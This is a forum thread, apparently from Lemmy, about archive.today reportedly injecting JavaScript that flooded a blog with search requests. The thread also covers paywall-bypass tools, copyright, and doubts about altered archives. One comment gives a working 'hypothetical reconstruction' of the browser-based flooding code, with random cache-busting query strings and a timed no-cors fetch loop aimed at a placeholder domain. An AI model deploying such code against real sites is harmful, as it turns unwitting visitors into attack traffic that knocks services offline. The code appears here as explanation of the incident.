- cross-posted to:
- technology@lemmy.world
For anyone curious, I looked into the DDoSing, and what was done is simple: a snippet of JavaScript was added to archive[.]today that made a background request to the blog with a randomly generated search parameter. Every time someone viewed an archive, they unknowingly sent a request to the blog under attack.
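For illustration, here is a hypothetical reconstruction of what such injected code might look like. This is not the actual snippet; the target URL, interval, and function names are all assumptions.

```javascript
// Hypothetical reconstruction of the injected attack code (not the actual
// snippet; the target URL and interval are assumptions for illustration).
function randomString(length) {
  const chars = "abcdefghijklmnopqrstuvwxyz0123456789";
  let out = "";
  for (let i = 0; i < length; i++) {
    out += chars[Math.floor(Math.random() * chars.length)];
  }
  return out;
}

// A random query string defeats any caching between the visitor and the
// blog, so every request forces the server to do real work.
function startAttack(targetOrigin, intervalMs) {
  return setInterval(() => {
    // "no-cors" lets the browser fire the request even though the response
    // is unreadable cross-origin; the load lands on the server either way.
    fetch(targetOrigin + "/?s=" + randomString(12), { mode: "no-cors" })
      .catch(() => {}); // errors are irrelevant to the attacker
  }, intervalMs);
}

// Something along these lines would run on every archive page view, e.g.:
// startAttack("https://victim-blog.example", 300);
```

The nasty part is that every ordinary visitor becomes an attack node, so the traffic comes from thousands of unrelated residential IPs and is hard to block.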
As someone who uses Bypass Paywalls Clean, this is so frustrating.
Bypass Paywalls Clean was chased off of the Firefox Add-ons site, chased off of GitLab, and chased off of GitHub via DMCA takedown notices for copyright infringement. It is now hosted on the Russian site GitFlic.ru.
We all know Russia sucks in a litany of ways, but one way it doesn’t suck is that it is one of the few countries left that has thrown all caution to the wind and absolutely said “fuck it” to respecting the international Big Copyright norms promoted by the US copyright cabal (RIAA/MPAA).
We have spent the better part of two decades dealing with the DMCA being used as an outright weapon to silence information that corporations and governments find inconvenient, mostly because that information is wildly incriminating for them. It works especially well because so much of the world’s internet has been consolidated in the US and its vast hosting infrastructure, like AWS and Cloudflare, putting enormous swaths of the internet under the direct influence of US laws like the DMCA.
Websites like Anna’s Archive, Libgen, and Sci-Hub survive because they use hosting in countries that allow them to bypass these kinds of restrictions. Russia is one of the most common countries for them to host data out of, due to its lack of copyright enforcement, although it is obviously not the only country these sites use.
Until we are able to alter international copyright protections to be reasonable instead of their current overzealous and abusive form, we will all have to risk such sites being hosted in countries that are otherwise very unsavory to associate with.
We live in the kind of world early piracy pioneers such as the original creators of The Pirate Bay were trying to keep from becoming a reality. The American copyright cabal fought tooth and nail to change Sweden’s interpretation of copyright law so they could send those men to prison.
hey thanks, i had never heard of that bypass paywalls firefox addon
There’s also a version for Chrome if you swing that way.
I do not because I don’t like ads on Youtube, but thx.
If this is not an announcement, Lemmy lets you edit your post titles so you can correct that mistake instead of luring in people who think lemmy.world is also banning links using archive.today.
I’m not speculating on your intent, only pointing out that you can correct this situation instead of apologizing after the fact.
I switched to .md when the community mentioned something was up with the .today domain. Hopefully that one isn’t compromised.
It’s the same person running all of them, so yeah it is.
Damn.
Affected URLs:

- archive[.]today
- archive[.]fo
- archive[.]is
- archive[.]li
- archive[.]md
- archive[.]ph
- archive[.]vn
- archiveiya74codqgiixo33q62qlrqtkgmcitqx5u2oeqnmn5bpcbiyd[.]onion

Good reminder to donate to web.archive.org
I do hope this move results in more support for the IA/Wayback Machine and helps them update some of their crawler tech. Thanks to the rise of AI, some sites are effectively (through CAPTCHAs, etc.) or actively (through straight-up greed [coughRedditcough]) blocked from being archived almost entirely, which is frustrating for legit archivists/contributors.
While archive.org is good and more trustworthy than archive.is, it isn’t as useful for bypassing paywalls.
This is understandable, but at the same time, none of the anti-paywall lists are as good as archive.today. They actually have paid accounts at a bunch of paywalled sites, and use them when scraping.
Unfortunately, they’ve allegedly modified the contents of some archived articles, so even though they may be better at archiving, nothing archived there is of any value because it cannot be trusted.

https://lemmy.world/c/ukraine was where i saw this. i didn’t write it. thought lemmy would have linked to the original, was wrong. FYI
Democracy died in daylight, the darkness hides the rotten body.
Everyone seems to be ignoring the fact that he only did this in response to a malicious dox attempt.
He only modified archived pages in response to a dox attempt?
And the thing is, the discovery of the modified pages revealed that it wasn’t even the first time he’d modified pages. And he used a real person’s identity to try and shift blame.
Irrespective of the doxxing allegations, if he’s done all this multiple times already, it means the page archives can’t be trusted AND there’s no guarantee that anything archived with the service will be available tomorrow.
Seems like we need to switch to URLs that contain the SHA256 of the page they’re linking to, so we can tell if anything has changed since the link was created.
Unfortunately, they shot themselves in the foot by responding the way they did. They basically did the job of anyone who wants them taken down and not trusted. It was probably the worst way they could have reacted. Such a tragedy to lose such a valuable website.
It wasn’t a dox attempt though. The blog just collected information that was already publicly available on other sites.
As they should since it doesn’t matter.
Yeah, someone being shitty to you doesn’t mean you go full-fledged shitty in return; that kind of proves your lack of trustworthiness to begin with. It’s like Nazis saying “leftists were mean to me by explaining how my politics made me a Nazi, so I’m gonna show them by Nazi-ing even harder! They forced me to be like this!” It kind of betrays the argument that the reason you got that way was because leftists were mean to you.
Bro, any archiving/scraping tool can be used for DDoS; u just tell it to archive the same site over and over, and now u have a different IP spamming the endpoint.
In this case, their CAPTCHA page intentionally included code to DoS a particular blog, sending a request to search for a random string every 300ms (search is very CPU-intensive). This was regardless of the archived site you were trying to view.
Any good archiver will check for an existing archived copy before making a request, and batch requests. This was very different from the attack you’re imagining: if you opened any archive.today page, it would poll a developer’s personal blog, regardless of whether you were interacting with content from that blog.
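A quick sketch of that check-before-fetching behavior (a hypothetical helper, not any real archiver's code; the fetch function is injectable so the logic is easy to exercise without a network):

```javascript
// Cache of already-archived pages: url -> saved copy.
const archiveCache = new Map();

// Only hit the origin server if we don't already hold a copy. A polite
// archiver does this check first, so repeat requests add zero load.
async function archiveOnce(url, fetchFn) {
  if (archiveCache.has(url)) {
    return archiveCache.get(url); // reuse the stored copy, no new request
  }
  const response = await fetchFn(url);
  const copy = { url, body: await response.text(), savedAt: Date.now() };
  archiveCache.set(url, copy);
  return copy;
}
```

Calling `archiveOnce` on the same URL twice only fetches once, which is the opposite of the random-query-string trick used in the attack, where every request is crafted to be uncacheable.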
don’t know all the details. fyi basically. i forget where i saw the same site mentioned for the same thing. don’t call me bro Bro